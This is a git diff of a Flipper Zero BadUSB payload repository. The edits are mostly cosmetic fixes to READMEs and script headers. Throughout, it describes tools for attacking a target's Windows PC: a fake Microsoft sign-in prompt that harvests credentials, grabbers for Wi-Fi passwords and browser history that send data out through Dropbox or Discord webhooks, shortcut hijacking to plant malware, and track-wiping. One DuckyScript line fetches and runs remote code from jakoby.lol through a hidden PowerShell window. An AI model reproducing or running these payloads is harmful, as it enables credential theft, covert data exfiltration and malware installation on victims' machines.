diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 index 4c3b3ba..f7e7dcf 100644 --- a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 +++ b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 @@ -19,13 +19,13 @@ <# .SYNOPSIS - This is an advanced recon of a target PC and exfiltration of that data + This is an advanced recon of a target PC and exfiltration of that data. .DESCRIPTION - This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running - All of the gather information is formatted neatly and output to a file - That file is then exfiltrated to cloud storage via DropBox + This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running. + All of the gather information is formatted neatly and output to a file. + That file is then exfiltrated to cloud storage via Dropbox. .Link - https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads + https://developers.dropbox.com/oauth-guide # Guide for setting up your Dropbox for uploads https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads #> diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.txt b/Payloads/Flip-ADV-Recon/ADV-Recon.txt index 66c2318..f9e5f5d 100644 --- a/Payloads/Flip-ADV-Recon/ADV-Recon.txt +++ b/Payloads/Flip-ADV-Recon/ADV-Recon.txt @@ -2,7 +2,7 @@ REM Title: ADV-Recon REM Author: I am Jakoby -REM Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details. +REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details. REM Target: Windows 10, 11 @@ -10,4 +10,3 @@ GUI r DELAY 500 STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex ENTER - diff --git a/Payloads/Flip-ADV-Recon/README.md b/Payloads/Flip-ADV-Recon/README.md index 8eb8857..8ebb0db 100644 --- a/Payloads/Flip-ADV-Recon/README.md +++ b/Payloads/Flip-ADV-Recon/README.md @@ -15,7 +15,7 @@ # ADV-Recon -A script used to do an advanced level of Recon on the targets computer. +A script used to do an advanced level of recon on the target's computer. Version 2 no longer requires you to host your own version of the script. @@ -25,11 +25,11 @@ Modifying the execution script is the only necessary interaction. This program enumerates a target PC to collect as much recon data as possible for future engagements. This includes: -* Hosts Powershell Version (to know what commands can be run) -* Name Associated with their Microsoft Account (Or ENV UserName variable if one is not detected) +* Hosts PowerShell Version (to know what commands can be run) +* Name associated with their Microsoft account (Or ENV UserName variable if one is not detected) * Whether they are in the Admin group or not -* The email associated with their Microsoft Account (for phishing possibilities) -* Other User accounts on their system (for possible privledge escalation) +* The email associated with their Microsoft account (for phishing possibilities) +* Other User accounts on their system (for possible privilege escalation) * Details on their login settings (Ex: Min/Max password age and length) * How many days since they have changed their password (Max password age - Days since = Opportunity) * Their GeoLocation (know their approximate where abouts) @@ -39,7 +39,7 @@ This program enumerates a target PC to collect as much recon data as possible fo * Network Interfaces (What are they connecting in and out with) * System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS) * Local Users (Accounts on system with Username, name associated with microsoft account and SID) -* Information on their HardDrives (Indicator of Recon Scope) +* Information on their hard drives (Indicator of Recon Scope) * COM and Serial Devices (Is there a device connected you can manipulate?) * Active TCP Connections (Poor mans Port Scanning) * Processes, Services, Software, and Drivers (What is running on the computer we can exploit?) @@ -50,7 +50,7 @@ This program enumerates a target PC to collect as much recon data as possible fo ### Dependencies -* DropBox or Discord +* Dropbox or Discord * Windows 10,11

(back to top)

diff --git a/Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt b/Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt index 72efffd..9e0e0d1 100644 --- a/Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt +++ b/Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt @@ -2,8 +2,8 @@ REM Title: ADV-RickRoll REM Author: I am Jakoby -REM Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume. -REM Upon deployment payload will pause until a mouse movement is detected and run once one is. +REM Description: This is a one liner payload that will Rick Roll your target. Video will be played at full screen and max volume. +REM Upon deployment, payload will pause until a mouse movement is detected and run once one is. REM Target: Windows 10, 11 diff --git a/Payloads/Flip-ADV-RickRoll/ReadMe.md b/Payloads/Flip-ADV-RickRoll/ReadMe.md index 0698cc5..77ba9e9 100644 --- a/Payloads/Flip-ADV-RickRoll/ReadMe.md +++ b/Payloads/Flip-ADV-RickRoll/ReadMe.md @@ -23,7 +23,7 @@ # ADV-RickRoll -A script used to do an advanced rick roll on your target +A script used to do an advanced rick roll on your target. ## Description diff --git a/Payloads/Flip-AcidBurn/README.md b/Payloads/Flip-AcidBurn/README.md index c8e51e9..a89c5e8 100644 --- a/Payloads/Flip-AcidBurn/README.md +++ b/Payloads/Flip-AcidBurn/README.md @@ -15,17 +15,17 @@ # Acid Burn -A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes. +A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes. ## Description -This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account. +This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with the Microsoft account. The SSID and WiFi password of any current or previously connected to networks. -It determines the last day they changed thier password and how many days ago. -Once the information is gathered the script will pause until a mouse movement is detected -Then the script uses Sapi speak to roast their set up and lack of security -If wifi networks and passwords are detected wallpaper will be changed to image displaying that information -Image generated will be saved to desktop, steganography is used to put hidden message at bottom of binary output of image generated +It determines the last day they changed their password and how many days ago. +Once the information is gathered, the script will pause until a mouse movement is detected. +Then, the script uses Sapi speak to roast their set up and lack of security. +If wifi networks and passwords are detected, the wallpaper will be changed to an image displaying that information. +The generated image will be saved to the desktop and steganography is used to put a hidden message at the bottom of the binary output of the generated image. ## Getting Started diff --git a/Payloads/Flip-BrowserData/README.md b/Payloads/Flip-BrowserData/README.md index bcab523..cc215a5 100644 --- a/Payloads/Flip-BrowserData/README.md +++ b/Payloads/Flip-BrowserData/README.md @@ -22,9 +22,9 @@ ## Description -This payload can be used to retrieve the browsing history and bookmarks from edge, chrome, and firefox (no bookmarks from firefox currently) +This payload can be used to retrieve the browsing history and bookmarks from Edge, Chrome, Opera GX, and Firefox (no bookmarks from firefox currently). -They are then exfiled using either discord or dropbox +They are then exfiled using either Discord or Dropbox. ## The Function diff --git a/Payloads/Flip-BrowserData/browserData.txt b/Payloads/Flip-BrowserData/browserData.txt index 0a584b0..7abfc2b 100644 --- a/Payloads/Flip-BrowserData/browserData.txt +++ b/Payloads/Flip-BrowserData/browserData.txt @@ -2,7 +2,7 @@ REM Title: Browser-Data REM Author: I am Jakoby -REM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, and Firefox +REM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, Firefox, and Opera GX. REM Target: Windows 10, 11 diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt b/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt index 4020a9f..e7a2997 100644 --- a/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt +++ b/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt @@ -2,7 +2,9 @@ REM Title: Credz-Plz REM Author: I am Jakoby -REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details. +REM Description: This payload prompts the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook. + +REM See README.md file for more details. REM Target: Windows 10, 11 diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 b/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 index dada758..58f6df9 100644 --- a/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 +++ b/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 @@ -25,7 +25,7 @@ A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" This will be followed by a fake authentication ui prompt. If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up - Once the target enters their credentials their information will be uploaded to your dropbox for collection + Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection .Link https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads diff --git a/Payloads/Flip-Credz-Plz/README.md b/Payloads/Flip-Credz-Plz/README.md index b61c1fe..3e178d6 100644 --- a/Payloads/Flip-Credz-Plz/README.md +++ b/Payloads/Flip-Credz-Plz/README.md @@ -15,18 +15,18 @@ # Credz-Plz -A script used to prompt the target to enter their creds to later be exfiltrated with dropbox. +A script used to prompt the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook. ## Description A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account". This will be followed by a fake authentication ui prompt. If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up. -Once the target enters their credentials their information will be uploaded to your dropbox for collection. +Once the target enters their credentials their information will be uploaded to your Dropbox or Discord webhook for collection. -![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg) +![alt text](https://i.imgur.com/mudQcIh.png) -![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg) +![alt text](https://i.imgur.com/3JqE7a8.png) ## Getting Started diff --git a/Payloads/Flip-Credz-Plz/authentication.jpg b/Payloads/Flip-Credz-Plz/authentication.jpg new file mode 100644 index 0000000..8e16d44 Binary files /dev/null and b/Payloads/Flip-Credz-Plz/authentication.jpg differ diff --git a/Payloads/Flip-Credz-Plz/sign-in.jpg b/Payloads/Flip-Credz-Plz/sign-in.jpg index 3330e2a..b719a8a 100644 Binary files a/Payloads/Flip-Credz-Plz/sign-in.jpg and b/Payloads/Flip-Credz-Plz/sign-in.jpg differ diff --git a/Payloads/Flip-Credz-Plz/unusual-sign-in.jpg b/Payloads/Flip-Credz-Plz/unusual-sign-in.jpg deleted file mode 100644 index ff0aad9..0000000 Binary files a/Payloads/Flip-Credz-Plz/unusual-sign-in.jpg and /dev/null differ diff --git a/Payloads/Flip-JumpScare-2.0/ReadMe.md b/Payloads/Flip-JumpScare-2.0/ReadMe.md index a85180e..012078d 100644 --- a/Payloads/Flip-JumpScare-2.0/ReadMe.md +++ b/Payloads/Flip-JumpScare-2.0/ReadMe.md @@ -23,7 +23,7 @@ # JumpScare 2.0 -A script used to jumpscare your target +A script used to jumpscare your target. ## Description @@ -31,7 +31,7 @@ This script will jumpscare your target. A jumpscare video will be downloaded to their temp directory. -When a mouse movement is detected that video will be played in the powershell console at max volume and fullscreen. +When a mouse movement is detected, that video will be played in the PowerShell console at max volume and fullscreen. ## Getting Started diff --git a/Payloads/Flip-JumpScare/README.md b/Payloads/Flip-JumpScare/README.md index 921a692..6eed6ef 100644 --- a/Payloads/Flip-JumpScare/README.md +++ b/Payloads/Flip-JumpScare/README.md @@ -15,7 +15,7 @@ # JumpScare -A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes. +A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes. ## Description diff --git a/Payloads/Flip-MustSub/Readme.md b/Payloads/Flip-MustSub/Readme.md index 088711b..6a01c8e 100644 --- a/Payloads/Flip-MustSub/Readme.md +++ b/Payloads/Flip-MustSub/Readme.md @@ -23,7 +23,7 @@ # Must Sub -A script used to get your target to subscribe to 15 of my favorite hacker youtube channels +A script used to get your target to subscribe to 15 of my favorite hacker YouTube channels. ## Description diff --git a/Payloads/Flip-PS-Draw/README.md b/Payloads/Flip-PS-Draw/README.md index 8c9aea0..667cd39 100644 --- a/Payloads/Flip-PS-Draw/README.md +++ b/Payloads/Flip-PS-Draw/README.md @@ -15,20 +15,20 @@ # PS-Draw -A script used to generate and draw images in the Powershell Window, used to leave a signature or perhaps taunt victims +A script used to generate and draw images in the PowerShell window, used to leave a signature or perhaps taunt victims. ## Description -These two programs use two different method to draw out images in the Powershell Window. +These two programs use two different methods to draw out images in the PowerShell window. PS-Draw will convert an image you download into a BMP file, estimate the colors used based off the 16 available powershell colors, -then draw your image out in the powershell window. This process is not exact and needs testing of multiple images to find one that works well. +then draw your image out in the PowerShell window. This process is not exact and needs testing of multiple images to find one that works well. -PS-Custom-Draw generates images to be drawn in the Powershell Window based off pre-configured arrays I put together already included in the file itself. +PS-Custom-Draw generates images to be drawn in the PowerShell window based off pre-configured arrays I put together already included in the file itself. These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose. After the images are generated, a greeting will be generated by grabbing either the name associated with the registered Microsoft account or the -UserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the powershell window. +UserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the PowerShell window. ## Getting Started diff --git a/Payloads/Flip-PineApple/README.md b/Payloads/Flip-PineApple/README.md index 2c86139..67f48d4 100644 --- a/Payloads/Flip-PineApple/README.md +++ b/Payloads/Flip-PineApple/README.md @@ -15,13 +15,13 @@ # PineApple -A script used to connect a targets PC to your wifi PineApple +A script used to connect a targets PC to your Wifi PineApple. ## Description This program will generate an XML file that will be used to create a network profile for your Wifi PineApple. -The XML file will be manually entered into a Powershell window. -The Powershell window and run box will be erased for a clean exit. +The XML file will be manually entered into a PowerShell window. +The PowerShell window and run box will be erased for a clean exit. ## Getting Started diff --git a/Payloads/Flip-Play-WAV/README.md b/Payloads/Flip-Play-WAV/README.md index f80f0a1..b2fa80c 100644 --- a/Payloads/Flip-Play-WAV/README.md +++ b/Payloads/Flip-Play-WAV/README.md @@ -15,14 +15,14 @@ # Play-WAV -A script used to download a WAV file and play it after a mouse movement is detected +A script used to download a WAV file and play it after a mouse movement is detected. ## Description This program starts off by using an Invoke-WebRequest to download a WAV file. The system volume is then turned up to the max level. Then the script will be paused until a mouse movement is detected. -After one is the WAV file will be played. +After a mouse movement is detected, the WAV file will be played. ## Getting Started @@ -34,7 +34,7 @@ After one is the WAV file will be played. ### Executing program -* Place the WAV Url in the $wav variable +* Place the WAV URL in the $wav variable * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download your WAV file diff --git a/Payloads/Flip-Rage-PopUps/README.md b/Payloads/Flip-Rage-PopUps/README.md index 6c54e81..7885087 100644 --- a/Payloads/Flip-Rage-PopUps/README.md +++ b/Payloads/Flip-Rage-PopUps/README.md @@ -15,11 +15,11 @@ # Rage-PopUps -A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes. +A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes. ## Description -This program will open a series of pop up boxes with insults in a loop that repeats as many times as you set it to. +This program will open a series of pop-up boxes with insults in a loop that repeats as many times as you set it to. There is a section in the Rage-PopUps.ps1 file where you insert your own insults or use the ones provided. ## Getting Started diff --git a/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 b/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 index 53d0cc1..ae5d6bf 100644 --- a/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 +++ b/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 @@ -19,10 +19,10 @@ <# .SYNOPSIS - This script will open a series of pop ups in order to taunt your target. I wrote it initially to target call center scammers + This script will open a series of pop-ups in order to taunt your target. I wrote it initially to target call center scammers. .DESCRIPTION - This program is to taunt your target. Below are a series insults you can modify as you like. The program will generate a PopUp + This program is meant to taunt your target. Below are a series insults you can modify as you like. The program will generate a Pop-up for each one of them. #> diff --git a/Payloads/Flip-ShortcutJacker/README.md b/Payloads/Flip-ShortcutJacker/README.md index 0592e9e..47e50af 100644 --- a/Payloads/Flip-ShortcutJacker/README.md +++ b/Payloads/Flip-ShortcutJacker/README.md @@ -30,23 +30,23 @@
YouTube Tutorial

-A script used to embed malware in the shortcut on your targets desktop +A script used to embed malware in the shortcut on your target's desktop. ## Description -This payload will run a powershell script in the background of any shortcut used on the targets desktop. +This payload will run a PowerShell script in the background of any shortcut used on the target's desktop. -This is done by taking advantage of the `Target` field where powershell commands can be stored or run. +This is done by taking advantage of the `Target` field where PowerShell commands can be stored or run. This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the `$code` variable and it will still run. -So if your command exceeds that consider using an IWR function to download and execute a longer script. +So if your command exceeds that, consider using an IWR function to download and execute a longer script. I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13) -Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored. +Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the PowerShell code you want executed is stored. --------------------------------------------------------------------------------------------------------------------------------------------------------- @@ -60,7 +60,7 @@ Using the `Get-Shortcut` function we will get the following information we can t ## Getting Started -Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file +Once the script is executed, all of the shortcuts on your target's desktop will be infected with the PowerShell code you have stored in the `$code` variable in the .ps1 file ### Dependencies diff --git a/Payloads/Flip-ShortcutJacker/Shortcut-Jacker.ps1 b/Payloads/Flip-ShortcutJacker/Shortcut-Jacker.ps1 index df36736..83603c4 100644 --- a/Payloads/Flip-ShortcutJacker/Shortcut-Jacker.ps1 +++ b/Payloads/Flip-ShortcutJacker/Shortcut-Jacker.ps1 @@ -19,12 +19,12 @@ <# .SYNOPSIS - This is payload used to inject powershell code into shortcuts + This is payload used to inject PowerShell code into shortcuts. .DESCRIPTION - This payload will gather information on the shortcuts on your targets desktop - That data will then be manipulated to embed a powershell script - This script will be ran in the background when the short cut is + This payload will gather information on the shortcuts on your targets desktop. + That data will then be manipulated to embed a PowerShell script. + This script will be ran in the background when the short cut is. #> @@ -32,7 +32,7 @@ <# .NOTES - The powershell code stored in this variable is what will run in the background + The PowerShell code stored in this variable is what will run in the background. This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code variable and it will still run. #> diff --git a/Payloads/Flip-Subscribe/README.md b/Payloads/Flip-Subscribe/README.md index 7419fea..8034274 100644 --- a/Payloads/Flip-Subscribe/README.md +++ b/Payloads/Flip-Subscribe/README.md @@ -15,11 +15,11 @@ # Subscribe -A script I put together to make your target subscribe to your youtube channel +A script I put together to make your target subscribe to your YouTube channel. ## Description -This script is set to open your youtube account in their browser where they will be prompted to subscribe to you. +This script is set to open your YouTube account in their browser where they will be prompted to subscribe to you. SPOILER: They do. ## Getting Started @@ -27,7 +27,7 @@ SPOILER: They do. ### Dependencies * Windows 10,11 -* Your target will have to be signed into their youtube account +* Your target will have to be signed into their YouTube account

(back to top)

diff --git a/Payloads/Flip-Subscribe/Subscribe.ps1 b/Payloads/Flip-Subscribe/Subscribe.ps1 index a5b2615..32f930e 100644 --- a/Payloads/Flip-Subscribe/Subscribe.ps1 +++ b/Payloads/Flip-Subscribe/Subscribe.ps1 @@ -19,11 +19,11 @@ <# .DESCRIPTION - This program is designed to get your target to subscribe to your youtube channel + This program is designed to get your target to subscribe to your YouTube channel. #> ############################################################################################################################################# -# Enter your youtube channel URL here, ONLY if you are rehosting this script yourself +# Enter your YouTube channel URL here, ONLY if you are rehosting this script yourself # $channel = "https://www.youtube.com/iamjakoby" diff --git a/Payloads/Flip-Subscribe/Subscribe.txt b/Payloads/Flip-Subscribe/Subscribe.txt index 4f6c910..5ba9c13 100644 --- a/Payloads/Flip-Subscribe/Subscribe.txt +++ b/Payloads/Flip-Subscribe/Subscribe.txt @@ -2,7 +2,7 @@ REM Title: Subscribe REM Author: I am Jakoby -REM Description: This payload is meant to make your target subscribe to your youtube channel +REM Description: This payload is meant to make your target subscribe to your YouTube channel REM Target: Windows 10, 11 diff --git a/Payloads/Flip-WallPaper-URL/ReadMe.md b/Payloads/Flip-WallPaper-URL/ReadMe.md index 9aa77e1..80bc107 100644 --- a/Payloads/Flip-WallPaper-URL/ReadMe.md +++ b/Payloads/Flip-WallPaper-URL/ReadMe.md @@ -15,13 +15,13 @@ # Wallpaper-URL -This payload will download an image from any URL and set it as the targets wallpaper +This payload will download an image from any URL and set it as the target's wallpaper. ## Description -Use this program to troll your friends. Find any image online and grab the url and insert it into the PS1 script. +Use this program to troll your friends. Find any image online and grab the URL and insert it into the PS1 script. Run this payload and step away. Once a mouse movement is detected, their wallpaper will change right in front of their eyes. -Lastly, to clean up your tracks behind you, the tmp folder will be emptied and the powershell and run box history will be wiped +Lastly, to clean up your tracks behind you, the tmp folder will be emptied and the PowerShell and run box history will be wiped. ## Getting Started diff --git a/Payloads/Flip-Wallpaper-Troll/README.md b/Payloads/Flip-Wallpaper-Troll/README.md index 5055d84..d840a0d 100644 --- a/Payloads/Flip-Wallpaper-Troll/README.md +++ b/Payloads/Flip-Wallpaper-Troll/README.md @@ -15,7 +15,7 @@ # Wallpaper-Troll -A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes. +A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes. ## Description diff --git a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 b/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 index 727c0a4..25e38a8 100644 --- a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 +++ b/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.ps1 @@ -21,10 +21,10 @@ .DESCRIPTION This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude, - Public IP, and and the SSID and WiFi password of any current or previously connected to networks. - It will take the gathered information and generate a .jpg with that information on show - Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned - Additionally a secret message will be left in the binary of the wallpaper image generated and left on their desktop + Public IP, the SSID, and WiFi password of any current or previously connected to networks. + It will take the gathered information and generate a .jpg with that information on show. + Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned. + Additionally, a secret message will be left in the binary of the wallpaper image generated and left on their desktop. #> ############################################################################################################################################# diff --git a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.txt b/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.txt index 0d80724..8a1069a 100644 --- a/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.txt +++ b/Payloads/Flip-Wallpaper-Troll/Wallpaper-Troll.txt @@ -2,11 +2,11 @@ REM Title: Wallpaper-Troll REM REM Author: I am Jakoby REM -REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details +REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details. REM REM Target: Windows 10, 11 REM -REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload +REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload. REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly REM REM -------------------------------------------------------------------------------------- diff --git a/Payloads/Flip-We-Found-You/We-Found-You.txt b/Payloads/Flip-We-Found-You/We-Found-You.txt index 637e169..3417dae 100644 --- a/Payloads/Flip-We-Found-You/We-Found-You.txt +++ b/Payloads/Flip-We-Found-You/We-Found-You.txt @@ -2,7 +2,7 @@ REM Title: We-Found-You REM Author: I am Jakoby -REM Description: This payload is meant to open a map in your targets web browser with their current location +REM Description: This payload is meant to open a map in your target's web browser with their current location. REM Target: Windows 10, 11 diff --git a/Payloads/Flip-We-Found-You/found-you.ps1 b/Payloads/Flip-We-Found-You/found-you.ps1 index a11b3ab..c4be40e 100644 --- a/Payloads/Flip-We-Found-You/found-you.ps1 +++ b/Payloads/Flip-We-Found-You/found-you.ps1 @@ -19,17 +19,17 @@ <# .NOTES - The targets Location Services must be turned on or this payload will not work + The target's Location Services must be turned on or this payload will not work. .SYNOPSIS - This script will get the users location and open a map of where they are in their browser and use windows speech to declare you know where they are + This script will get the user's location and open a map of where they are in their browser and use Windows speech to declare you know where they are. .DESCRIPTION - This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account. + This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with their Microsoft account. The SSID and WiFi password of any current or previously connected to networks. It determines the last day they changed their password and how many days ago. - Once the information is gathered the script will pause until a mouse movement is detected - Then the script uses Sapi speak to roast their set up and lack of security + Once the information is gathered, the script will pause until a mouse movement is detected. + Then the script uses Sapi speak to roast their set up and lack of security. #> #----------------------------------------------------------------------------------------------------------------------------------------------------------- @@ -37,7 +37,7 @@ <# .NOTES - This is to get the Name associate with the targets microsoft account, if not detected UserName will be used + This is to get the name associated with the targets Microsoft account, if not detected UserName will be used. #> function Get-fullName { diff --git a/Payloads/Flip-WifiGrabber/README.md b/Payloads/Flip-WifiGrabber/README.md index f792724..0159b90 100644 --- a/Payloads/Flip-WifiGrabber/README.md +++ b/Payloads/Flip-WifiGrabber/README.md @@ -17,7 +17,7 @@ ## Description -This payload grabs your targets wifi passwords and uploads them to either Dropbox, Discord, or both +This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both. ## Getting Started @@ -30,9 +30,9 @@ This payload grabs your targets wifi passwords and uploads them to either Dropbo * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory -`$dc` is the variable that stores your discord webhook +`$dc` is the variable that stores your Discord webhook -`$db` is the variable that stores your dropbox token +`$db` is the variable that stores your Dropbox token Fill in either or both of these to methods to exfil your collected data diff --git a/Payloads/Flip-WifiGrabber/WifiGrabber.ps1 b/Payloads/Flip-WifiGrabber/WifiGrabber.ps1 index 297ff66..56284e6 100644 --- a/Payloads/Flip-WifiGrabber/WifiGrabber.ps1 +++ b/Payloads/Flip-WifiGrabber/WifiGrabber.ps1 @@ -7,7 +7,7 @@ $wifiProfiles > $env:TEMP/--wifi-pass.txt ############################################################################################################################################################ -# Upload output file to dropbox +# Upload output file to Dropbox function DropBox-Upload { diff --git a/Payloads/Flip-WifiGrabber/WifiGrabber.txt b/Payloads/Flip-WifiGrabber/WifiGrabber.txt index d68a51d..8629c95 100644 --- a/Payloads/Flip-WifiGrabber/WifiGrabber.txt +++ b/Payloads/Flip-WifiGrabber/WifiGrabber.txt @@ -2,7 +2,7 @@ REM Title: Wifi Grabber REM Author: I am Jakoby -REM Description: This payload grabs your targets wifi passwords and uploads them to either Dropbox, Discord, or both +REM Description: This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both. REM Target: Windows 10, 11 diff --git a/Payloads/Flip-YT-Tripwire/ReadMe.md b/Payloads/Flip-YT-Tripwire/ReadMe.md index cd8a236..8d37495 100644 --- a/Payloads/Flip-YT-Tripwire/ReadMe.md +++ b/Payloads/Flip-YT-Tripwire/ReadMe.md @@ -23,14 +23,14 @@ # YouTube Tripwire -Plays any YouTube video after a mouse movement is detected +Plays any YouTube video after a mouse movement is detected. ## Description This script is a one liner that can fit in the runbox by itself. -Just replace the URL for the Youtube video and run it. +Just replace the URL for the YouTube video and run it. You can now unplug your device and walk away. -When your target returns and moves their mouse the video will start playing full screen. +When your target returns and moves their mouse, the video will start playing full screen. ## Getting Started diff --git a/Payloads/Flip-YT-Tripwire/YouTube-TripWire.txt b/Payloads/Flip-YT-Tripwire/YouTube-TripWire.txt index be2584b..f7d6fd1 100644 --- a/Payloads/Flip-YT-Tripwire/YouTube-TripWire.txt +++ b/Payloads/Flip-YT-Tripwire/YouTube-TripWire.txt @@ -1,7 +1,6 @@ REM Title: YouTube-TripWire REM Author: I am Jakoby -REM Description: Plays any YouTube video after a mouse movement is detected -REM Replace URL with your own +REM Description: Plays any YouTube video after a mouse movement is detected. (Replace URL with your own) REM Target: Windows 10, 11 GUI r DELAY 500 diff --git a/README.md b/README.md index f24fb6b..0f12ae1 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ # 🐬 Flipper-Zero-BadUSB 🐬 -If you would like to support the work that I do please consider becoming a subscriber in our Discord +If you would like to support the work that I do, please consider becoming a subscriber in our Discord. [SUBSCRIBE](https://jakoby.lol/tah) @@ -53,9 +53,9 @@ Subscribing to my YouTube would also be really appreciated. This repository has been optimized to facilitate plug and play functionality. -I purchased the domain `jakoby.lol` for the sole purpose of creating my own short URLs +I purchased the domain `jakoby.lol` for the sole purpose of creating my own short URLs. -I did this with the intention of making room for discord webhooks and dropbox tokens to fit in my one liners +I did this with the intention of making room for discord webhooks and dropbox tokens to fit in my one liners. This in turn makes it so the user no longer has to host their own version of the script.